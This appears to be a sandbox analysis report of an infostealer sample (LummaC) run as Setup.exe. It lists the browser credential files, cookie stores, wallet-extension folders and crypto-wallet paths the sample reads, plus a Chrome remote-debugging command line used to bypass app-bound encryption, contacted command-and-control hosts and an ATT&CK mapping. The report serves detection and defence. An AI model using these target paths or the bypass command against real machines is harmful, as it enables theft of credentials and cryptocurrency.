        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
        Tries to steal Crypto Currency Wallets
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
        Source: Yara matchFile source: 0000000A.00000002.2489986911.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 6556, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Attempt to bypass Chrome Application-Bound Encryption
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223
        Yara detected LummaC Stealer
        Source: Yara matchFile source: 0000000A.00000002.2480222478.0000000001329000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Windows Management Instrumentation        		1
        DLL Side-Loading        		11
        Process Injection        		1
        Virtualization/Sandbox Evasion        		1
        OS Credential Dumping        		111
        Security Software Discovery        		Remote Services3
        Data from Local System        		1
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        DLL Side-Loading        		11
        Process Injection        		LSASS Memory1
        Virtualization/Sandbox Evasion        		Remote Desktop ProtocolData from Removable Media1
        Remote Access Software        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
        Rundll32        		Security Account Manager1
        Process Discovery        		SMB/Windows Admin SharesData from Network Shared Drive1
        Ingress Tool Transfer        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        DLL Side-Loading        		NTDS1
        File and Directory Discovery        		Distributed Component Object ModelInput Capture3
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets22
        System Information Discovery        		SSHKeylogging4
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        No Antivirus matches

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://optimizationguide-pa.goog0%Avira URL Cloudsafe
        https://restfulzpillow.bet/bWijt0%Avira URL Cloudsafe
        https://restfulzpillow.bet/bWij0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        plus.l.google.com
        		142.250.185.206
        		truefalse
          		high
          play.google.com
          		142.250.186.142
          		truefalse
            		high
            t.me
            		149.154.167.99
            		truefalse
              		high
              restfulzpillow.bet
              		104.21.11.150
              		truetrue
                		unknown
                www.google.com
                		142.250.74.196
                		truefalse
                  		high
                  apis.google.com
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                      		high
                      https://restfulzpillow.bet/bWijfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://t.me/owowoowokk3j4false
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://mail.google.com/mail/?usp=installed_webappchrome.exe, 0000000D.00000002.2608165594.0000691401540000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2599017524.000069140116C000.00000004.00001000.00020000.00000000.sdmpfalse
                          		high
                          https://goto.google.com/sme-bugs2echrome.exe, 0000000D.00000003.1934861305.0000691401D54000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1934181990.0000691401AF4000.00000004.00001000.00020000.00000000.sdmpfalse
                            		high
                            https://duckduckgo.com/ac/?q=Setup.exe, 0000000A.00000003.1871147523.0000000003CCB000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.broofa.comchromecache_69.14.drfalse
                                		high
                                https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditingchrome.exe, 0000000D.00000002.2569784819.0000691400444000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
